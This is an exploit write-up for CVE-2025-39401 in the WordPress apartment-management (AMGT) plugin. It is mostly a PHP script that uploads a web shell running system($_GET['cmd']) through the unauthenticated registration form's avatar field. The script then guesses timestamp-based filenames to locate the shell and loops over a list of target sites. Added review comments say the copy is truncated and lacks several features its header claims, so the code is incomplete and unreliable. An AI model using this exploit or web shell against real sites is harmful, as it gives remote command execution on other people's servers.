=============================================================================================================================================
| # Title : WordPress AMGT 44.0 RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.com/plugins/browse/apartment-management |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212164/ & CVE-2025-39401
[+] Summary : A vulnerability in the AMGT membership registration form allows an attacker to upload arbitrary files via the "amgt_user_avatar" parameter. The uploaded file is stored with a timestamp-based filename that can be guessed, allowingremote code execution. – PHP Multi‑Target PoC
[+] Affected : Any WordPress installation running AMGT plugin.
[+] Impact : Full Remote Code Execution (RCE) in the server’s context.
[+] Requirements : No authentication required.
[+] Notes : This PHP PoC supports :
- Multi-threading simulation using curl_multi
- Timestamp brute forcing
- Cross‑platform compatibility (Linux/Windows/macOS/BSD)
- Custom markers to validate shell execution
- Randomized payload and alternative bypass strategies
[+] Usage : See instructions at the bottom of this report.
[+] POC : Indoushka_RCE\\n"; system(\$_GET['cmd']); ?>
PAYLOAD;

/*
 * NOTE(review): this copy is truncated. The opening <?php tag, the configuration
 * block that defines $SHELL_LOCAL_FILE, $USER_AGENT, $SUCCESS_FILE, $UPLOADED_FILE,
 * $INITIAL_SLEEP, $RETRIES, $BETWEEN_RETRIES and $WINDOW, and the start of the
 * $default_shell_payload heredoc are missing; only the heredoc terminator above
 * survived. The visible tail of the payload is an unauthenticated web shell
 * (system($_GET['cmd'])): anyone who finds the dropped file gets command execution,
 * so on an engagement it must be removed from the target once the finding is
 * confirmed. Nothing in the code below deletes it. Remediation for the target is a
 * vendor-patched plugin release per the CVE advisory.
 */

/* Save shell if missing: write the default payload to disk so CURLFile can read it.
   The return value of file_put_contents() is not checked. */
if (!file_exists($SHELL_LOCAL_FILE)) {
    file_put_contents($SHELL_LOCAL_FILE, $default_shell_payload);
}

/* ---------------------- HELPERS ------------------------- */

/**
 * Append one line ($value followed by PHP_EOL) to $file.
 * The write result is discarded, so a failure to record a hit is silent.
 */
function write_result($file, $value) {
    file_put_contents($file, $value . PHP_EOL, FILE_APPEND);
}

/**
 * Build the filename the stored upload is expected to have:
 * "<ts>-<mark>-in.<ext>", with <ext> taken from $original's extension.
 * NOTE(review): the "<ts>-pimg-in" scheme is assumed to mirror the plugin's
 * rename logic — confirm against the vulnerable plugin source before relying on it.
 */
function generate_filename($original, $ts, $mark = "pimg") {
    $ext = pathinfo($original, PATHINFO_EXTENSION);
    return "{$ts}-{$mark}-in.{$ext}";
}

/**
 * Multipart POST of $fields merged with $files (CURLFile values) to $url.
 * Returns [HTTP status, response body]. TLS peer and host verification are
 * disabled, so the tool itself is exposed to interception; curl_exec() failure
 * is not checked, in which case the body is false and the status is 0.
 */
function http_post($url, $fields, $files, $ua) {
    $curl = curl_init();
    curl_setopt_array($curl, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_USERAGENT => $ua,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => array_merge($fields, $files),
        CURLOPT_TIMEOUT => 30
    ]);
    $resp = curl_exec($curl);
    $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    curl_close($curl);
    return [$status, $resp];
}

/**
 * Plain GET of $url with the supplied user agent and a 20 s timeout.
 * Returns [HTTP status, response body]; same unverified-TLS and unchecked
 * curl_exec() caveats as http_post().
 */
function http_get($url, $ua) {
    $curl = curl_init();
    curl_setopt_array($curl, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_USERAGENT => $ua,
        CURLOPT_TIMEOUT => 20
    ]);
    $resp = curl_exec($curl);
    $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    curl_close($curl);
    return [$status, $resp];
}

/* ------------------- EXPLOIT FUNCTION --------------------- */

/**
 * Run the upload against one target, then try to locate the stored file.
 *
 * Visible steps:
 *   1. bail out if the local shell file is missing;
 *   2. POST the member-registration form with the shell as "amgt_user_avatar";
 *   3. sleep $INITIAL_SLEEP seconds, then GET candidate URLs under
 *      /wp-content/uploads/apartment_assets/ for timestamps in
 *      [$ts-$WINDOW, $ts+$WINDOW] shifted by the retry number, stopping at the
 *      first 200 response whose body contains $marker.
 *
 * Results are appended to $SUCCESS_FILE ("target | url") and $UPLOADED_FILE (url).
 *
 * NOTE(review): the response from http_post() is discarded, so a wrong page
 * slug (404), a rejected upload or a WAF block is not detected and the
 * brute-force still runs. $ts is the attacker's clock; the guessed name only
 * matches if the server's clock agrees within $WINDOW seconds. A status of 0
 * in the "[x]" output means a transport error, not an HTTP 404.
 */
function exploit_target($target_url, $marker) {
    global $USER_AGENT, $SHELL_LOCAL_FILE, $SUCCESS_FILE, $UPLOADED_FILE, $INITIAL_SLEEP, $RETRIES, $BETWEEN_RETRIES, $WINDOW;

    if (!file_exists($SHELL_LOCAL_FILE)) {
        echo "[ERROR] Missing shell file.\n";
        return;
    }

    // Client-side timestamp; also used to make the registration email unique.
    $ts = time();
    $email = "indoushka_{$ts}@exploit.com";

    echo "\n[+] Uploading shell to: $target_url\n";
    $upload_url = rtrim($target_url, "/") . "/apartment-management-member-registration-page/";

    // Form fields filled with static values; only "email" is derived from $ts.
    $fields = [
        "building_id" => "1",
        "unit_cat_id" => "2",
        "unit_name" => "Unit-X",
        "member_type" => "Owner",
        "first_name" => "Indo",
        "last_name" => "Ushka",
        "gender" => "male",
        "birth_date" => "1990-01-01",
        "mobile" => "99887766",
        "email" => $email,
        "password" => "Indo1337!",
        "registration_front_member" => "1"
    ];
    $files = [
        "amgt_user_avatar" => new CURLFile($SHELL_LOCAL_FILE)
    ];

    // Upload response deliberately ignored (see NOTE above).
    http_post($upload_url, $fields, $files, $USER_AGENT);

    echo "[+] Uploaded. Sleeping {$INITIAL_SLEEP}s...\n";
    sleep($INITIAL_SLEEP);

    echo "[+] Brute-forcing timestamp window...\n";
    for ($attempt = 0; $attempt < $RETRIES; $attempt++) {
        for ($d = -$WINDOW; $d <= $WINDOW; $d++) {
            // Each retry shifts the whole window forward by one second.
            $guess = $ts + $d + $attempt;
            $name = generate_filename($SHELL_LOCAL_FILE, $guess);
            $shell_url = rtrim($target_url, "/") . "/wp-content/uploads/apartment_assets/" . $name;

            list($code, $body) = http_get($shell_url, $USER_AGENT);
            // A hit requires both a 200 and the marker in the body, which shows
            // the file was executed as PHP rather than merely stored.
            if ($code == 200 && strpos($body, $marker) !== false) {
                echo "[✓] SHELL FOUND: $shell_url\n";
                write_result($SUCCESS_FILE, "$target_url | $shell_url");
                write_result($UPLOADED_FILE, $shell_url);
                return;
            }
            echo "[x] $code → $shell_url\n";
        }
        sleep($BETWEEN_RETRIES);
    }
    echo "[✗] Not found.\n";
}

/* ------------------ MAIN ------------------ */
// Interactive entry point: reads a target-list path and an optional marker from
// stdin, then runs exploit_target() over every non-empty line, one target after
// another. NOTE(review): processing is sequential — the curl_multi, randomised
// payload and "alternative bypass" features listed in the header are not present
// in this copy of the code. If $list cannot be read, file() returns false, the
// foreach emits a warning, and "Done. Results saved." is still printed.
echo "\n=== AMGT PHP Exploit by Indoushka ===\n";
$list = readline("Enter targets file (e.g., list.txt): ");
$marker = readline("Enter shell marker (default: Indoushka_RCE): ");
// readline() returns false on EOF and "" on an empty answer; both fall back to the default.
if (!$marker) $marker = "Indoushka_RCE";

$targets = file($list, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) {
    exploit_target(trim($t), $marker);
}
echo "\nDone. Results saved.\n";

Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================